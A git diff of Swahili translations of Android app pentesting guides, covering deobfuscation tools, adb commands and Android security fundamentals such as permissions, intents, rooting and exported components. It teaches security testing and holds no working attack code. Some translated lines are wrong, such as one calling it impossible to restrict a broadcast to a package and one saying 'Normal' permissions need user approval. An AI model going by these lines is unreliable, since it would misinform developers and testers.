@ -698,7 +698,7 @@ Pata mwongozo wa hatua kwa hatua wa kuondoa obfuscation ya apk katika [https://b
**DeGuard inarudisha mchakato wa obfuscation uliofanywa na zana za obfuscation za Android. Hii inaruhusu uchambuzi mwingi wa usalama, ikiwa ni pamoja na ukaguzi wa msimbo na kutabiri maktaba.**
Unaweza kupakia APK iliyofichwa kwenye jukwaa lao.
Unaweza kupakia APK iliyokuwa obfuscated kwenye jukwaa lao.
### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
@ -706,21 +706,21 @@ Hii ni zana ya LLM ya kutafuta udhaifu wowote wa usalama katika programu za andr
### [Simplify](https://github.com/CalebFenton/simplify)
Ni **deobfuscator ya kawaida ya android.** Simplify **inatekeleza programu kwa karibu** ili kuelewa tabia yake na kisha **jaribu kuboresha msimbo** ili iwe na tabia sawa lakini iwe rahisi kwa binadamu kuelewa. Kila aina ya kuboresha ni rahisi na ya kawaida, hivyo haijalishi ni aina gani maalum ya obfuscation inayotumika.
Ni **deobfuscator ya android ya jumla.** Simplify **inatekeleza programu kwa karibu** ili kuelewa tabia yake na kisha **jaribu kuboresha msimbo** ili iwe na tabia sawa lakini iwe rahisi kwa binadamu kuelewa. Kila aina ya kuboresha ni rahisi na ya jumla, hivyo haijalishi ni aina gani maalum ya obfuscation inayotumika.
### [APKiD](https://github.com/rednaga/APKiD)
APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua waandishi wengi wa **kompyuta**, **paket**, **obfuscators**, na vitu vingine vya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua **makandarasi** wengi, **paket** , **obfuscators**, na vitu vingine vya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
### Manual
[Somai mwongo huu kujifunza mbinu za **jinsi ya kurudi nyuma obfuscation ya kawaida**](manual-deobfuscation.md)
[Somai mwongo huu kujifunza mbinu kadhaa za **jinsi ya kurudisha obfuscation ya kawaida**](manual-deobfuscation.md)
## Labs
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b ni mashine ya virtual ya usalama ya Android inayotegemea ubuntu-mate inajumuisha mkusanyiko wa mfumo wa hivi karibuni, mafunzo na maabara kutoka kwa wahandisi wa usalama na watafiti mbalimbali kwa ajili ya uhandisi wa nyuma na uchambuzi wa malware.
AndroL4b ni mashine ya virtual ya usalama ya Android inayotegemea ubuntu-mate inajumuisha mkusanyiko wa mfumo wa hivi karibuni, mafunzo na maabara kutoka kwa wahandisi wa usalama na watafiti mbalimbali kwa ajili ya reverse engineering na uchambuzi wa malware.
## References

4
src/mobile-pentesting/android-app-pentesting/adb-commands.md
View File

@ -207,7 +207,7 @@ Ili **kuchuja ujumbe wa programu moja tu**, pata PID ya programu na tumia grep (
adb logcat | grep 4526
adb logcat | findstr 4526
```
### adb logcat \[chaguo] \[vipimo-vichujio]
### adb logcat \[option] \[filter-specs]
```bash
adb logcat
```
@ -281,7 +281,7 @@ adb shell pm list packages -f -3 #List packages
adb backup -f myapp_backup.ab -apk com.myapp # backup on one device
adb restore myapp_backup.ab # restore to the same or any other device
```
Ikiwa unataka kukagua maudhui ya nakala ya akiba:
Ikiwa unataka kukagua maudhui ya nakala:
```bash
( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 myapp_backup.ab ) | tar xfvz -
```

78
src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
View File

@ -6,67 +6,67 @@
**Kuna tabaka mbili:**
- **OS**, ambayo inashikilia programu zilizowekwa mbali na kila mmoja.
- **OS**, ambayo inashikilia programu zilizowekwa kuwa mbali na kila mmoja.
- **programu yenyewe**, ambayo inaruhusu waendelezaji **kuweka wazi kazi fulani** na kuunda uwezo wa programu.
### Kutenganisha UID
**Kila programu inapewa Kitambulisho Maalum cha Mtumiaji**. Hii inafanywa wakati wa usakinishaji wa programu ili **programu iweze kuingiliana tu na faili zinazomilikiwa na Kitambulisho chake cha Mtumiaji au faili zilizoshirikiwa**. Hivyo, ni programu yenyewe tu, vipengele fulani vya OS na mtumiaji wa root wanaweza kufikia data za programu.
**Kila programu inapewa Kitambulisho Maalum cha Mtumiaji (UID)**. Hii inafanywa wakati wa usakinishaji wa programu ili **programu iweze kuingiliana tu na faili zinazomilikiwa na Kitambulisho chake cha Mtumiaji au faili zilizoshirikiwa**. Hivyo, ni programu yenyewe tu, vipengele fulani vya OS na mtumiaji wa root wanaweza kufikia data za programu.
### Kushiriki UID
**Programu mbili zinaweza kuwekewa mipangilio kutumia UID sawa**. Hii inaweza kuwa na manufaa kushiriki taarifa, lakini ikiwa moja yao itashambuliwa, data za programu zote mbili zitakuwa hatarini. Hii ndiyo sababu tabia hii inapaswa **kuepukwa**.\
**Programu mbili zinaweza kuwekewa mipangilio kutumia UID sawa**. Hii inaweza kuwa na manufaa kushiriki taarifa, lakini ikiwa moja yao itashambuliwa, data za programu zote mbili zitakuwa hatarini. Hii ndiyo sababu tabia hii inachukuliwa kuwa **haifai**.\
**Ili kushiriki UID sawa, programu lazima iwe na thamani sawa ya `android:sharedUserId` katika hati zao.**
### Sandboxing
**Android Application Sandbox** inaruhusu kuendesha **kila programu** kama **mchakato tofauti chini ya Kitambulisho tofauti cha Mtumiaji**. Kila mchakato una mashine yake ya virtual, hivyo msimbo wa programu unafanya kazi kwa kujitenga na programu nyingine.\
**Sanduku la Programu za Android** linaruhusu kuendesha **kila programu** kama **mchakato tofauti chini ya Kitambulisho tofauti cha Mtumiaji**. Kila mchakato una mashine yake ya virtual, hivyo msimbo wa programu unafanya kazi kwa kujitenga na programu nyingine.\
Kuanzia Android 5.0(L) **SELinux** inatekelezwa. Kimsingi, SELinux ilikataa mwingiliano wote wa mchakato na kisha kuunda sera za **kuruhusu tu mwingiliano unaotarajiwa kati yao**.
### Ruhusa
Wakati unaposakinisha **programu na inahitaji ruhusa**, programu inahitaji ruhusa zilizowekwa katika vipengele vya **`uses-permission`** katika faili ya **AndroidManifest.xml**. Kipengele cha **uses-permission** kinaonyesha jina la ruhusa inayohitajika ndani ya **attribute** ya **jina**. Pia ina **maxSdkVersion** ambayo inazuia kuomba ruhusa kwenye toleo lililo juu ya lile lililotajwa.\
Wakati unaposakinisha **programu na inahitaji ruhusa**, programu inahitaji ruhusa zilizowekwa katika **`uses-permission`** vipengele katika **AndroidManifest.xml** faili. Kipengele cha **uses-permission** kinaonyesha jina la ruhusa inayohitajika ndani ya **attribute** **name**. Pia ina **maxSdkVersion** attribute ambayo inakomesha kuomba ruhusa kwenye toleo lililo juu ya lile lililotajwa.\
Kumbuka kwamba programu za android hazihitaji kuomba ruhusa zote mwanzoni, zinaweza pia **kuomba ruhusa kwa njia ya kidinamik** lakini ruhusa zote lazima **zitangazwe** katika **manifest**.
Wakati programu inatoa kazi inaweza kupunguza **ufikiaji kwa programu tu ambazo zina ruhusa maalum**.\
Kipengele cha ruhusa kina attributes tatu:
- **jina** la ruhusa
- attribute ya **permission-group**, ambayo inaruhusu kuunganisha ruhusa zinazohusiana.
- **permission-group** attribute, ambayo inaruhusu kuunganisha ruhusa zinazohusiana.
- **protection-level** ambayo inaonyesha jinsi ruhusa zinavyotolewa. Kuna aina nne:
- **Normal**: Inatumika wakati hakuna **hatari zinazojulikana** kwa programu. Mtumiaji **huhitajika kuidhinisha**.
- **Dangerous**: Inaonyesha ruhusa inatoa programu inayohitaji ufikiaji **wa juu**. **Watumiaji wanahitajika kuidhinisha**.
- **Signature**: Ni tu **programu zilizotiwa saini na cheti sawa na ile** inayosambaza kipengele zinaweza kupewa ruhusa. Hii ndiyo aina yenye nguvu zaidi ya ulinzi.
- **SignatureOrSystem**: Ni tu **programu zilizotiwa saini na cheti sawa na ile** inayosambaza kipengele au **programu zinazofanya kazi na ufikiaji wa kiwango cha mfumo** zinaweza kupewa ruhusa.
- **Signature**: Ni tu **programu zilizosainiwa na cheti sawa na ile** inayosambaza kipengele zinaweza kupewa ruhusa. Hii ndiyo aina yenye nguvu zaidi ya ulinzi.
- **SignatureOrSystem**: Ni tu **programu zilizosainiwa na cheti sawa na ile** inayosambaza kipengele au **programu zinazofanya kazi na ufikiaji wa kiwango cha mfumo** zinaweza kupewa ruhusa.
## Programu Zilizowekwa Kabla
Programu hizi kwa ujumla hupatikana katika **`/system/app`** au **`/system/priv-app`** na baadhi yao zime **boreshwa** (huenda usipate hata faili ya `classes.dex`). Programu hizi zinastahili kuangaliwa kwa sababu wakati mwingine zinakuwa **zinakimbia na ruhusa nyingi sana** (kama root).
Programu hizi kwa ujumla hupatikana katika **`/system/app`** au **`/system/priv-app`** directories na baadhi yao zime **boreshwa** (huenda usipate hata faili ya `classes.dex`). Programu hizi zinastahili kuangaliwa kwa sababu wakati mwingine zinaweza kuwa **zinatumika na ruhusa nyingi sana** (kama root).
- Zile zinazokuja na **AOSP** (Android OpenSource Project) **ROM**
- Zile zinazokuja na **AOSP** (Mradi wa Msource wa Android) **ROM**
- Zilizoongezwa na **mtengenezaji wa kifaa**
- Zilizoongezwa na **mtoa huduma wa simu** (ikiwa imenunuliwa kutoka kwao)
## Rooting
Ili kupata ufikiaji wa root kwenye kifaa halisi cha android kwa ujumla unahitaji **kuchokoza** 1 au 2 **vulnerabilities** ambazo huwa **maalum** kwa **kifaa** na **toleo**.\
Mara baada ya kuchokoza kufanya kazi, kwa kawaida faili ya `su` ya Linux inakopishwa kwenye eneo lililotajwa katika mabadiliko ya PATH ya mtumiaji kama `/system/xbin`.
Ili kupata ufikiaji wa root kwenye kifaa halisi cha android kwa ujumla unahitaji **kuchokoza** 1 au 2 **mapungufu** ambayo huwa **maalum** kwa **kifaa** na **toleo**.\
Mara baada ya kuchokoza kufanya kazi, kwa kawaida faili ya `su` ya Linux inakopishwa kwenye eneo lililotajwa katika PATH env variable ya mtumiaji kama `/system/xbin`.
Mara baada ya faili ya su kuwekwa, programu nyingine ya Android inatumika kuungana na faili ya `su` na **kusindika maombi ya ufikiaji wa root** kama **Superuser** na **SuperSU** (inapatikana kwenye Google Play store).
Mara baada ya faili ya su kuwekwa, programu nyingine ya Android inatumika kuungana na faili ya `su` na **kusindika maombi ya ufikiaji wa root** kama **Superuser** na **SuperSU** (inapatikana kwenye duka la Google Play).
> [!CAUTION]
> Kumbuka kwamba mchakato wa rooting ni hatari sana na unaweza kuharibu kifaa vibaya
### ROMs
Inawezekana **kurekebisha OS kwa kusakinisha firmware maalum**. Kufanya hivi inawezekana kuongeza matumizi ya kifaa cha zamani, kupita vizuizi vya programu au kupata ufikiaji wa msimbo wa hivi punde wa Android.\
**OmniROM** na **LineageOS** ni mbili ya firmware maarufu zaidi za kutumia.
Inawezekana **kuchukua nafasi ya OS kwa kusakinisha firmware maalum**. Kufanya hivi inawezekana kuongeza matumizi ya kifaa cha zamani, kupita vizuizi vya programu au kupata ufikiaji wa msimbo wa hivi karibuni wa Android.\
**OmniROM** na **LineageOS** ni mbili za firmware maarufu zaidi za kutumia.
Kumbuka kwamba **sio kila wakati ni lazima ku-root kifaa** ili kusakinisha firmware maalum. **Wakati wengine wa watengenezaji wanaruhusu** kufungua bootloaders zao kwa njia iliyoandikwa vizuri na salama.
### Matokeo
Mara kifaa kikiwa kime-rooted, programu yoyote inaweza kuomba ufikiaji kama root. Ikiwa programu mbaya itapata hiyo, inaweza kuwa na ufikiaji wa karibu kila kitu na itakuwa na uwezo wa kuharibu simu.
Mara kifaa kikiwa kime-rooted, programu yoyote inaweza kuomba ufikiaji kama root. Ikiwa programu mbaya itapata hiyo, itakuwa na ufikiaji wa karibu kila kitu na itakuwa na uwezo wa kuharibu simu.
## Msingi wa Programu za Android <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
@ -81,13 +81,13 @@ Mara kifaa kikiwa kime-rooted, programu yoyote inaweza kuomba ufikiaji kama root
- **classes.dex**
- Inashikilia bytecode ya Dalvik, inayoakisi msimbo wa Java (au Kotlin) uliotayarishwa ambao programu inatekeleza kwa default.
- lib/
- Inashikilia maktaba asilia, iliyogawanywa kwa usanifu wa CPU katika saraka ndogo.
- Inashikilia maktaba asilia, iliyogawanywa kwa usanifu wa CPU katika subdirectories.
- `armeabi`: msimbo wa processors za msingi wa ARM
- `armeabi-v7a`: msimbo wa processors za ARMv7 na za juu
- `x86`: msimbo wa processors za X86
- `mips`: msimbo wa processors za MIPS pekee
- assets/
- Inahifadhi faili mbalimbali zinazohitajika na programu, huenda ikajumuisha maktaba za asilia za ziada au faili za DEX, wakati mwingine hutumiwa na waandishi wa malware kuficha msimbo wa ziada.
- Inahifadhi faili mbalimbali zinazohitajika na programu, huenda ikijumuisha maktaba za asilia au faili za DEX, wakati mwingine hutumiwa na waandishi wa malware kuficha msimbo wa ziada.
- res/
- Inashikilia rasilimali ambazo hazijakusanywa katika resources.arsc
@ -99,7 +99,7 @@ Kwa ajili ya uhandisi wa nyuma, **Smali** inakuwa muhimu. Ni toleo linaloweza ku
## Intents
Intents ndiyo njia kuu ambayo programu za Android zinawasiliana kati ya vipengele vyake au na programu nyingine. Hizi ni vitu vya ujumbe vinaweza pia kubeba data kati ya programu au vipengele, sawa na jinsi maombi ya GET/POST yanavyotumiwa katika mawasiliano ya HTTP.
Intents ndiyo njia kuu ambayo programu za Android zinawasiliana kati ya vipengele vyake au na programu nyingine. Hizi ni vitu vya ujumbe vinaweza pia kubeba data kati ya programu au vipengele, sawa na jinsi maombi ya GET/POST yanavyotumika katika mawasiliano ya HTTP.
Hivyo, Intent kimsingi ni **ujumbe unaopita kati ya vipengele**. Intents **zinaweza kuelekezwa** kwa vipengele maalum au programu, **au zinaweza kutumwa bila mpokeaji maalum**.\
Ili kuwa rahisi, Intent inaweza kutumika:
@ -107,18 +107,18 @@ Ili kuwa rahisi, Intent inaweza kutumika:
- Kuanzisha Activity, kwa kawaida kufungua kiolesura cha mtumiaji kwa programu
- Kama matangazo ya kuarifu mfumo na programu kuhusu mabadiliko
- Kuanzisha, kusitisha, na kuwasiliana na huduma ya nyuma
- Kufikia data kupitia ContentProviders
- Kupata data kupitia ContentProviders
- Kama kurudi nyuma kushughulikia matukio
Ikiwa kuna udhaifu, **Intents zinaweza kutumika kufanya mashambulizi mbalimbali**.
Ikiwa ni hatari, **Intents zinaweza kutumika kufanya mashambulizi mbalimbali**.
### Kichujio cha Intent
**Kichujio cha Intents** kinaelezea **jinsi shughuli, huduma, au Mpokeaji wa Matangazo yanaweza kuingiliana na aina tofauti za Intents**. Kimsingi, zinaelezea uwezo wa vipengele hivi, kama vile ni vitendo gani wanaweza kutekeleza au aina gani za matangazo wanaweza kushughulikia. Mahali kuu pa kutangaza vichujio hivi ni ndani ya **faili ya AndroidManifest.xml**, ingawa kwa Mpokeaji wa Matangazo, kuandika ni chaguo pia.
**Kichujio cha Intents** kinaelezea **jinsi shughuli, huduma, au Mpokeaji wa Matangazo unaweza kuingiliana na aina tofauti za Intents**. Kimsingi, zinaelezea uwezo wa vipengele hivi, kama vile ni vitendo gani wanaweza kutekeleza au aina gani za matangazo wanaweza kushughulikia. Mahali kuu pa kutangaza vichujio hivi ni ndani ya **faili ya AndroidManifest.xml**, ingawa kwa Mpokeaji wa Matangazo, kuandika ni chaguo pia.
Vichujio vya Intents vinajumuisha makundi, vitendo, na vichujio vya data, huku kukiwa na uwezekano wa kujumuisha metadata ya ziada. Mpangilio huu unaruhusu vipengele kushughulikia Intents maalum zinazolingana na vigezo vilivyotangazwa.
Nafasi muhimu ya vipengele vya Android (shughuli/huduma/watoa maudhui/mpokeaji wa matangazo) ni uonekano wao au **hadhi ya umma**. Kipengele kinachukuliwa kuwa cha umma na kinaweza kuingiliana na programu nyingine ikiwa kime **`exported`** na thamani ya **`true`** au ikiwa kichujio cha Intent kimewekwa kwa ajili yake katika hati. Hata hivyo, kuna njia kwa waendelezaji kuweka vipengele hivi kuwa binafsi, kuhakikisha havihusiani na programu nyingine bila kukusudia. Hii inafanywa kwa kuweka **`exported`** attribute kuwa **`false`** katika tafsiri zao za hati.
Nafasi muhimu ya vipengele vya Android (shughuli/huduma/watoa maudhui/mpokeaji wa matangazo) ni mwonekano wao au **hadhi ya umma**. Kipengele kinachukuliwa kuwa cha umma na kinaweza kuingiliana na programu nyingine ikiwa kime **`exported`** na thamani ya **`true`** au ikiwa kichujio cha Intent kimewekwa kwa ajili yake katika hati. Hata hivyo, kuna njia kwa waendelezaji kuweka vipengele hivi kuwa binafsi, kuhakikisha havihusiani na programu nyingine bila kukusudia. Hii inafanywa kwa kuweka **`exported`** attribute kuwa **`false`** katika tafsiri zao za hati.
Zaidi ya hayo, waendelezaji wana chaguo la kuimarisha ufikiaji wa vipengele hivi zaidi kwa kuhitaji ruhusa maalum. **`permission`** attribute inaweza kuwekwa ili kulazimisha kwamba ni programu tu zenye ruhusa iliyotolewa zinaweza kufikia kipengele, kuongeza safu ya ziada ya usalama na udhibiti juu ya nani anaweza kuingiliana nayo.
```java
@ -132,9 +132,9 @@ Intents huundwa kimaandishi kwa kutumia mjenzi wa Intent:
```java
Intent email = new Intent(Intent.ACTION_SEND, Uri.parse("mailto:"));
```
**Kitendo** cha nia iliyotangazwa hapo awali ni **ACTION_SEND** na **Ziada** ni mailto **Uri** (Ziada ikiwa ni taarifa ya ziada ambayo nia inatarajia).
**Kitendo** cha nia iliyotangazwa hapo awali ni **ACTION_SEND** na **Ziada** ni mailto **Uri** (Ziada ni taarifa ya ziada ambayo nia inatarajia).
Nia hii inapaswa kutangazwa ndani ya manifest kama katika mfano ufuatao:
Nia hii inapaswa kutangazwa ndani ya hati kama ilivyo katika mfano ufuatao:
```xml
<activity android:name="ShareActivity">
<intent-filter>
@ -153,7 +153,7 @@ Explicit intent inabainisha jina la darasa ambalo inalenga:
```java
Intent downloadIntent = new (this, DownloadService.class):
```
Katika programu nyingine ili kufikia nia iliyotangazwa hapo awali unaweza kutumia:
Katika programu nyingine ili kufikia nia iliyotangazwa awali unaweza kutumia:
```java
Intent intent = new Intent();
intent.setClassName("com.other.app", "com.other.app.ServiceName");
@ -161,15 +161,15 @@ context.startService(intent);
```
### Pending Intents
Hizi zinawaruhusu programu nyingine **kuchukua hatua kwa niaba ya programu yako**, wakitumia utambulisho na ruhusa za programu yako. Kujenga Pending Intent inapaswa **kueleza intent na hatua ya kutekeleza**. Ikiwa **intent iliyotangazwa si ya Moja kwa Moja** (haijatangaza ni intent ipi inayoweza kuitwa) programu **mbaya inaweza kutekeleza hatua iliyotangazwa** kwa niaba ya programu ya mwathirika. Zaidi ya hayo, **ikiwa hatua haijatangazwa**, programu mbaya itakuwa na uwezo wa kufanya **hatua yoyote kwa niaba ya mwathirika**.
Hizi zinawaruhusu programu nyingine **kuchukua hatua kwa niaba ya programu yako**, wakitumia utambulisho na ruhusa za programu yako. Kujenga Pending Intent inapaswa **kuelezwa intent na hatua ya kutekeleza**. Ikiwa **intent iliyotangazwa si ya Moja kwa Moja** (haijatangaza ni intent ipi inayoweza kuitwa) programu **mbaya inaweza kutekeleza hatua iliyotangazwa** kwa niaba ya programu ya mwathirika. Zaidi ya hayo, **ikiwa hatua haijatangazwa**, programu mbaya itakuwa na uwezo wa kufanya **hatua yoyote kwa niaba ya mwathirika**.
### Broadcast Intents
Tofauti na intents za awali, ambazo zinapokelewa na programu moja tu, broadcast intents **zinaweza kupokelewa na programu nyingi**. Hata hivyo, kuanzia toleo la API 14, ni **muwezekano wa kueleza programu ambayo inapaswa kupokea** ujumbe kwa kutumia Intent.setPackage.
Tofauti na intents za awali, ambazo zinapokelewa na programu moja tu, broadcast intents **zinaweza kupokelewa na programu nyingi**. Hata hivyo, kuanzia toleo la API 14, ni **mpossible kuweka programu ambayo inapaswa kupokea** ujumbe kwa kutumia Intent.set Package.
Vinginevyo, pia inawezekana **kueleza ruhusa wakati wa kutuma matangazo**. Programu inayopokea itahitaji kuwa na ruhusa hiyo.
Kuna **aina mbili** za Matangazo: **Ya Kawaida** (asynchronous) na **Iliyopangwa** (synchronous). **Agizo** linategemea **kipaumbele kilichowekwa ndani ya** kipengele cha mpokeaji. **Kila programu inaweza kushughulikia, kupeleka au kuacha Matangazo.**
Kuna **aina mbili** za Matangazo: **Kawaida** (asynchronous) na **Iliyopangwa** (synchronous). **Agizo** linategemea **kipaumbele kilichowekwa ndani ya** kipengele cha mpokeaji. **Kila programu inaweza kushughulikia, kupeleka au kuacha Matangazo.**
Inawezekana **kutuma** **matangazo** kwa kutumia kazi `sendBroadcast(intent, receiverPermission)` kutoka kwa darasa la `Context`.\
Unaweza pia kutumia kazi **`sendBroadcast`** kutoka kwa **`LocalBroadCastManager`** inahakikisha **ujumbe hauondoki kwenye programu**. Kwa kutumia hii hutahitaji hata kusafirisha kipengele cha mpokeaji.
@ -180,7 +180,7 @@ Aina hii ya Matangazo **inaweza kufikiwa muda mrefu baada ya kutumwa**.\
Hizi zilikataliwa katika kiwango cha API 21 na inashauriwa **usizitumie**.\
**Zinawaruhusu programu yoyote kunusa data, lakini pia kuibadilisha.**
Ikiwa unapata kazi zinazo na neno "sticky" kama **`sendStickyBroadcast`** au **`sendStickyBroadcastAsUser`**, **angalia athari na jaribu kuziondoa**.
Ikiwa unapata kazi zinazojumuisha neno "sticky" kama **`sendStickyBroadcast`** au **`sendStickyBroadcastAsUser`**, **angalia athari na jaribu kuondoa**.
## Deep links / URL schemes
@ -223,9 +223,9 @@ Jifunze jinsi ya [kuita deep links bila kutumia kurasa za HTML](./#exploiting-sc
- **Huduma Zilizofungwa**: Huduma hizi hutumia AIDL kwa IPC, zikiwezesha shughuli au vipengele kuungana na huduma, kufanya maombi, na kupokea majibu. Njia ya `onBind` katika darasa la huduma ni muhimu kwa kuanzisha mwingiliano, ikifanya kuwa eneo muhimu kwa ukaguzi wa usalama katika kutafuta udhaifu.
- **Messenger**: Ikifanya kazi kama huduma iliyo fungwa, Messenger inarahisisha IPC kwa kuzingatia usindikaji wa data kupitia njia ya `onBind`. Ni muhimu kukagua njia hii kwa karibu kwa usimamizi wowote usio salama wa data au utekelezaji wa kazi nyeti.
- **Messenger**: Ikifanya kazi kama huduma iliyo fungwa, Messenger inarahisisha IPC kwa kuzingatia usindikaji wa data kupitia njia ya `onBind`. Ni muhimu kukagua njia hii kwa karibu kwa usimamizi usio salama wa data au utekelezaji wa kazi nyeti.
- **Binder**: Ingawa matumizi ya moja kwa moja ya darasa la Binder si ya kawaida sana kutokana na ufafanuzi wa AIDL, ni muhimu kuelewa kwamba Binder inafanya kazi kama dereva wa kiwango cha kernel unaowezesha uhamasishaji wa data kati ya maeneo ya kumbukumbu ya michakato tofauti. Kwa ufahamu zaidi, rasilimali inapatikana kwenye [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
- **Binder**: Ingawa matumizi ya moja kwa moja ya darasa la Binder si ya kawaida sana kutokana na ufafanuzi wa AIDL, ni muhimu kuelewa kwamba Binder inafanya kazi kama dereva wa kiwango cha kernel unawezesha uhamasishaji wa data kati ya maeneo ya kumbukumbu ya michakato tofauti. Kwa ufahamu zaidi, rasilimali inapatikana kwenye [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
## Vipengele
@ -256,7 +256,7 @@ Mzunguko wa maisha wa shughuli **uanza na njia ya onCreate**, kuandaa UI na kuan
### Aina ya Programu
Katika maendeleo ya Android, programu ina chaguo la kuunda **aina ya** [Application](https://developer.android.com/reference/android/app/Application) darasa, ingawa si lazima. Wakati aina kama hiyo imefafanuliwa, inakuwa darasa la kwanza kuanzishwa ndani ya programu. Njia ya **`attachBaseContext`**, ikiwa imeanzishwa katika aina hii, inatekelezwa kabla ya njia ya **`onCreate`**. Mpangilio huu unaruhusu kuanzishwa mapema kabla ya sehemu nyingine za programu kuanza.
Katika maendeleo ya Android, programu ina chaguo la kuunda **aina ya chini** ya [Application](https://developer.android.com/reference/android/app/Application) darasa, ingawa si lazima. Wakati aina kama hiyo inafafanuliwa, inakuwa darasa la kwanza kuanzishwa ndani ya programu. Njia ya **`attachBaseContext`**, ikiwa imeanzishwa katika aina hii, inatekelezwa kabla ya njia ya **`onCreate`**. Mpangilio huu unaruhusu kuanzishwa mapema kabla ya sehemu nyingine za programu kuanza.
```java
public class MyApp extends Application {
@Override
@ -276,7 +276,7 @@ super.onCreate();
[Services](https://developer.android.com/guide/components/services) ni **operatives za nyuma** zinazoweza kutekeleza kazi bila kiolesura cha mtumiaji. Kazi hizi zinaweza kuendelea kukimbia hata watumiaji wanapobadilisha programu, na kufanya huduma kuwa muhimu kwa **operesheni za muda mrefu**.
Huduma ni za kubadilika; zinaweza kuanzishwa kwa njia mbalimbali, huku **Intents** ikiwa njia kuu ya kuzindua huduma kama kiingilio cha programu. Mara huduma inapozinduliwa kwa kutumia njia ya `startService`, njia yake ya `onStart` inaanza kufanya kazi na inaendelea kukimbia hadi njia ya `stopService` itakapoitwa wazi. Vinginevyo, ikiwa jukumu la huduma linategemea muunganisho wa mteja ulio hai, njia ya `bindService` inatumika kuunganisha mteja na huduma, ikihusisha njia ya `onBind` kwa ajili ya kupitisha data.
Huduma ni za kubadilika; zinaweza kuanzishwa kwa njia mbalimbali, huku **Intents** ikiwa njia kuu ya kuzindua kama kiingilio cha programu. Mara huduma inapozinduliwa kwa kutumia njia ya `startService`, njia yake ya `onStart` inaanza kufanya kazi na inaendelea kukimbia hadi njia ya `stopService` itakapoitwa wazi. Vinginevyo, ikiwa jukumu la huduma linategemea muunganisho wa mteja ulio hai, njia ya `bindService` inatumika kuunganisha mteja na huduma, ikihusisha njia ya `onBind` kwa ajili ya kupitisha data.
Matumizi ya kuvutia ya huduma ni pamoja na upigaji muziki wa nyuma au upataji wa data ya mtandao bila kuingilia mwingiliano wa mtumiaji na programu. Aidha, huduma zinaweza kufanywa kupatikana kwa michakato mingine kwenye kifaa hicho hicho kupitia **exporting**. Hii si tabia ya kawaida na inahitaji usanidi wazi katika faili ya Android Manifest:
```xml
@ -286,7 +286,7 @@ Matumizi ya kuvutia ya huduma ni pamoja na upigaji muziki wa nyuma au upataji wa
**Broadcast receivers** hufanya kazi kama wasikilizaji katika mfumo wa ujumbe, ikiruhusu programu nyingi kujibu ujumbe sawa kutoka kwa mfumo. Programu inaweza **kujiandikisha mpokeaji** kwa **njia mbili kuu**: kupitia **Manifest** ya programu au **kwa njia ya kidinamik** ndani ya msimbo wa programu kupitia **`registerReceiver`** API. Katika Manifest, matangazo yanachujwa kwa ruhusa, wakati wapokeaji waliojiandikisha kwa njia ya kidinamik wanaweza pia kubainisha ruhusa wakati wa kujiandikisha.
**Intent filters** ni muhimu katika mbinu zote za kujiandikisha, zikiamua matangazo gani yanayochochea mpokeaji. Mara matangazo yanayolingana yanapotumwa, njia ya **`onReceive`** ya mpokeaji inaitwa, ikiruhusu programu kujibu ipasavyo, kama kubadilisha tabia kwa kujibu onyo la betri ya chini.
**Intent filters** ni muhimu katika mbinu zote za kujiandikisha, zikiamua matangazo gani yanayochochea mpokeaji. Mara matangazo yanayolingana yatumwa, njia ya **`onReceive`** ya mpokeaji inaitwa, ikiruhusu programu kujibu ipasavyo, kama kubadilisha tabia kwa kujibu onyo la betri ya chini.
Matangazo yanaweza kuwa **asynchronous**, yakifika kwa wapokeaji wote bila mpangilio, au **synchronous**, ambapo wapokeaji wanapata matangazo kulingana na vipaumbele vilivyowekwa. Hata hivyo, ni muhimu kutambua hatari ya usalama, kwani programu yoyote inaweza kujipa kipaumbele ili kukamata tangazo.
@ -296,7 +296,7 @@ Ili kuelewa kazi ya mpokeaji, angalia njia ya **`onReceive`** ndani ya darasa la
**Content Providers** ni muhimu kwa **kushiriki data iliyopangwa** kati ya programu, ikisisitiza umuhimu wa kutekeleza **ruhusa** ili kuhakikisha usalama wa data. Wanaruhusu programu kufikia data kutoka vyanzo mbalimbali, ikiwa ni pamoja na hifadhidata, mifumo ya faili, au mtandao. Ruhusa maalum, kama **`readPermission`** na **`writePermission`**, ni muhimu kwa kudhibiti ufikiaji. Zaidi ya hayo, ufikiaji wa muda unaweza kutolewa kupitia mipangilio ya **`grantUriPermission`** katika manifest ya programu, ikitumia sifa kama `path`, `pathPrefix`, na `pathPattern` kwa udhibiti wa ufikiaji wa kina.
Uthibitisho wa ingizo ni muhimu ili kuzuia udhaifu, kama vile SQL injection. Content Providers zinasaidia operesheni za msingi: `insert()`, `update()`, `delete()`, na `query()`, zikisaidia katika kubadilisha na kushiriki data kati ya programu.
Uthibitisho wa ingizo ni muhimu ili kuzuia udhaifu, kama vile SQL injection. Content Providers zinasaidia operesheni za msingi: `insert()`, `update()`, `delete()`, na `query()`, zikifanya iwe rahisi kubadilisha na kushiriki data kati ya programu.
**FileProvider**, Content Provider maalum, inazingatia kushiriki faili kwa usalama. Inafafanuliwa katika manifest ya programu kwa sifa maalum za kudhibiti ufikiaji wa folda, zinazoonyeshwa na `android:exported` na `android:resource` zikielekeza kwenye mipangilio ya folda. Tahadhari inashauriwa wakati wa kushiriki saraka ili kuepuka kufichua data nyeti bila kukusudia.
@ -328,13 +328,13 @@ WebViews ni kama **vibrowser vidogo** ndani ya programu za Android, vinavyovuta
Android inatoa aina mbili kuu za WebView:
- **WebViewClient** ni mzuri kwa HTML ya msingi lakini haisaidii kazi ya arifa ya JavaScript, ikihusisha jinsi mashambulizi ya XSS yanavyoweza kupimwa.
- **WebChromeClient** inafanya kazi kama uzoefu kamili wa kivinjari cha Chrome.
- **WebChromeClient** inafanya kazi zaidi kama uzoefu kamili wa kivinjari cha Chrome.
Jambo muhimu ni kwamba vibrowser vya WebView **havishiriki vidakuzi** na kivinjari kikuu cha kifaa.
